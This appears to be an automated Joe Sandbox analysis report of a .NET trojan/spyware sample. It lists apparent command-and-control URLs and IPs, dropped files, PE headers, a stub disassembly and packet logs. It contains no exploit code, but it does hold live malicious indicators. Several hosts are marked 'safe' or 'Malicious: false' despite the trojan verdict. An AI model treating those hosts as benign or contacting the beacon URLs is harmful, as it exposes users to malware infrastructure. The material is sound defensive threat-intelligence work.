http://www.quantummquest.top/0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.dainikmirpur.com/0hhg/ | Malicious: false | Virustotal: 0% | Avira URL Cloud: safe | Reputation: unknown
http://www.yamiyasheec.online/0hhg/ | Malicious: false | Virustotal: 3% | Avira URL Cloud: safe | Reputation: unknown
http://www.dhleba51.ru/0hhg/ | Malicious: false | Virustotal: 4% | Avira URL Cloud: malware | Reputation: unknown
http://www.xxaiai.top/0hhg/ | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.dainikmirpur.com/0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
http://www.bettaroom.ru/0hhg/ | Malicious: false | Virustotal: 8% | Avira URL Cloud: safe | Reputation: unknown
http://www.cucuzeus88.store/0hhg/ | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
Name | Source (process memory dumps) | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netsh.exe | false | - | high
https://duckduckgo.com/ac/?q= | netsh.exe | false | - | high
https://www.instagram.com/hover_domains | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.nic.ru/catalog/ssl/ | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netsh.exe | false | - | high
https://www.nic.ru/ | jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
http://push.zhanzhang.baidu.com/push.js | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/email?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/about?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.nic.ru/catalog/domains/ | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.nic.ru/help/oshibka-404_8500.html | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/domains/results | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.nic.ru/catalog/hosting/shared/ | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netsh.exe | false | - | high
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/tools?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://help.hover.com/home?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://yastatic.net/pcode/adfox/loader.js | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/domain_pricing?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/privacy?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://twitter.com/hover | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | Avira URL Cloud: safe | unknown
https://www.hover.com/transfer_in?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/renew?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netsh.exe | false | - | high
https://zz.bdstatic.com/linksubmit/push.js | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.nic.ru/catalog/hosting/dedicated/ | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.ecosia.org/newtab/ | netsh.exe | false | - | high
https://ac.ecosia.org/autocomplete?q= | netsh.exe | false | - | high
https://www.nic.ru/catalog/hosting/vds-vps/ | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://www.hover.com/tos?source=parked | netsh.exe, netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
http://www.bnbuotqakx.shop | jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | Avira URL Cloud: malware | unknown
https://www.nic.ru/catalog/hosting/ | netsh.exe, jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netsh.exe | false | - | high
https://www.hover.com/?source=parked | jBaxmaKIzqHZYEOPQcTTJTXx.exe | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.50.127 | www.quantummquest.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false
195.24.68.5 | www.dhleba51.ru | Russian Federation | 48287 | RU-CENTERRU | false
153.92.8.41 | cucuzeus88.store | Germany | 47583 | AS-HOSTINGERLT | false
101.99.93.157 | bnbuotqakx.shop | Malaysia | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | false
188.116.38.155 | applesolve.com | Poland | 43333 | NEPHAX-ASPL | false
148.251.36.121 | vavada-band.ru | Germany | 24940 | HETZNER-ASDE | false
119.18.54.116 | yamiyasheec.online | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
108.186.8.158 | www.xxaiai.top | United States | 54600 | PEGTECHINCUS | false
192.250.235.36 | dainikmirpur.com | United States | 36454 | CNSV-LLCUS | false
91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | false
194.58.112.173 | www.bettaroom.ru | Russian Federation | 197695 | AS-REGRU | false
216.40.34.41 | www.whirledairlines.com | Canada | 15348 | TUCOWSCA | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435169
Start date and time: 2024-05-02 08:23:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 8s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: yZcecBUXN7.exe (renamed because original name is a hash value)
Original Sample Name: 9cd48f0d93c28ae6559409de23414554.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@14/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
Time | Type | Description
08:25:02 | API Interceptor | 6957285x Sleep call for process: netsh.exe modified
                                                                                                    No context
Process: C:\Users\user\Desktop\yZcecBUXN7.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 706
Entropy (8bit): 5.349842958726647
Encrypted: false
SSDEEP: 12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
MD5: 9BA266AD16952A9A57C3693E0BCFED48
SHA1: 5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
SHA-256: A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
SHA-512: 678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
Process: C:\Windows\SysWOW64\netsh.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.622095379937431
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:yZcecBUXN7.exe
                                                                                                    File size:631'808 bytes
                                                                                                    MD5:9cd48f0d93c28ae6559409de23414554
                                                                                                    SHA1:a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
                                                                                                    SHA256:3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
                                                                                                    SHA512:1204b683f15e89bb0f09b1be5fd3a18afbe83c72e95023cc58864924bec0f2dd3f228983365f654e22e822e7c0438c0b4d37660b8e2d875881ab859a488f4c34
                                                                                                    SSDEEP:12288:vDo1nsbnnnnncQlbt7WD31NYfr2S+K/WKBGEnnnnnnnnnnnnnnnnnnnnnnnnnnnO:LAnsbnnnnnXtaDFNYjnTzBNnnnnnnnnU
                                                                                                    TLSH:5DD4E03D9BD84A39D9AFCB3BD0F05911F632F2E2158AD34E5095A3B91D07790EA0235B
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.................0.................. ........@.. ....................................@................................
                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                    Entrypoint:0x49b6de
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x9b68c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9c000          0x642         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x996e4       0x99800   6d9456d015054223a50697288d2ae862  False     0.7322914546009772  data       7.633926656601929    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x9c000          0x642         0x800     af09505b4658a694da8a50f0e7f65376  False     0.349609375         data       3.5330423110083116   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x9e000          0xc           0x200     e968bd63315dda314fc03eb83b10c2fd  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA      Size   Type                                                                             Language  Country  ZLIB Complexity
RT_VERSION   0x9c0a0  0x3b8  COM executable for DOS                                                                               0.42436974789915966
RT_MANIFEST  0x9c458  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
May 2, 2024 08:24:43.249557972 CEST  49736        80         192.168.2.4     148.251.36.121
May 2, 2024 08:24:43.424362898 CEST  80           49736      148.251.36.121  192.168.2.4
May 2, 2024 08:24:43.424546957 CEST  49736        80         192.168.2.4     148.251.36.121
May 2, 2024 08:24:43.587449074 CEST  49736        80         192.168.2.4     148.251.36.121
May 2, 2024 08:24:43.762599945 CEST  80           49736      148.251.36.121  192.168.2.4
May 2, 2024 08:24:43.763344049 CEST  80           49736      148.251.36.121  192.168.2.4
May 2, 2024 08:24:43.763531923 CEST  80           49736      148.251.36.121  192.168.2.4
May 2, 2024 08:24:43.763606071 CEST  49736        80         192.168.2.4     148.251.36.121
May 2, 2024 08:24:44.548010111 CEST  49736        80         192.168.2.4     148.251.36.121
May 2, 2024 08:24:44.722882986 CEST  80           49736      148.251.36.121  192.168.2.4
May 2, 2024 08:25:02.053174019 CEST  49738        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:02.264493942 CEST  80           49738      194.58.112.173  192.168.2.4
May 2, 2024 08:25:02.264668941 CEST  49738        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:02.266545057 CEST  49738        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:02.475363970 CEST  80           49738      194.58.112.173  192.168.2.4
May 2, 2024 08:25:02.513768911 CEST  80           49738      194.58.112.173  192.168.2.4
May 2, 2024 08:25:02.513788939 CEST  80           49738      194.58.112.173  192.168.2.4
May 2, 2024 08:25:02.513833046 CEST  49738        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:03.779613972 CEST  49738        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:04.798501015 CEST  49739        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:05.002785921 CEST  80           49739      194.58.112.173  192.168.2.4
May 2, 2024 08:25:05.002911091 CEST  49739        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:05.004878998 CEST  49739        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:05.208945036 CEST  80           49739      194.58.112.173  192.168.2.4
May 2, 2024 08:25:05.224226952 CEST  80           49739      194.58.112.173  192.168.2.4
May 2, 2024 08:25:05.224246025 CEST  80           49739      194.58.112.173  192.168.2.4
May 2, 2024 08:25:05.224351883 CEST  49739        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:05.225511074 CEST  49739        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:06.628921986 CEST  49739        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:09.596995115 CEST  49740        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:09.801656961 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:09.801799059 CEST  49740        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:09.804352999 CEST  49740        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:10.009121895 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009144068 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009156942 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009166956 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009188890 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009258986 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009270906 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009371042 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.009432077 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.032634020 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.032651901 CEST  80           49740      194.58.112.173  192.168.2.4
May 2, 2024 08:25:10.032741070 CEST  49740        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:11.310885906 CEST  49740        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:12.329361916 CEST  49741        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:12.531092882 CEST  80           49741      194.58.112.173  192.168.2.4
May 2, 2024 08:25:12.531203032 CEST  49741        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:12.829895973 CEST  49741        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:13.031876087 CEST  80           49741      194.58.112.173  192.168.2.4
May 2, 2024 08:25:13.080692053 CEST  80           49741      194.58.112.173  192.168.2.4
May 2, 2024 08:25:13.080713987 CEST  80           49741      194.58.112.173  192.168.2.4
May 2, 2024 08:25:13.080780029 CEST  49741        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:13.792197943 CEST  49741        80         192.168.2.4     194.58.112.173
May 2, 2024 08:25:13.993874073 CEST  80           49741      194.58.112.173  192.168.2.4
May 2, 2024 08:25:19.750816107 CEST  49742        80         192.168.2.4     195.24.68.5
May 2, 2024 08:25:19.958864927 CEST  80           49742      195.24.68.5     192.168.2.4
May 2, 2024 08:25:19.959019899 CEST  49742        80         192.168.2.4     195.24.68.5
May 2, 2024 08:25:19.965226889 CEST  49742        80         192.168.2.4     195.24.68.5
                                                                                                    May 2, 2024 08:25:20.173122883 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.175931931 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.175975084 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.175988913 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176024914 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176028967 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176043987 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176070929 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176079988 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176120043 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176145077 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176199913 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176213026 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176227093 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176242113 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176259995 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384119987 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384149075 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384219885 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384248018 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384330988 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384344101 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384378910 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384380102 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384454966 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384501934 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384520054 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384532928 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384572983 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384588003 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384602070 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384637117 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384661913 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384722948 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384762049 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384785891 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384841919 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384880066 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384896994 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384965897 CEST8049742195.24.68.5192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    May 2, 2024 08:24:42.305643082 CEST6184053192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:24:43.243988991 CEST53618401.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:00.439603090 CEST6327553192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:01.043719053 CEST53632751.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:18.798521042 CEST5142353192.168.2.41.1.1.1
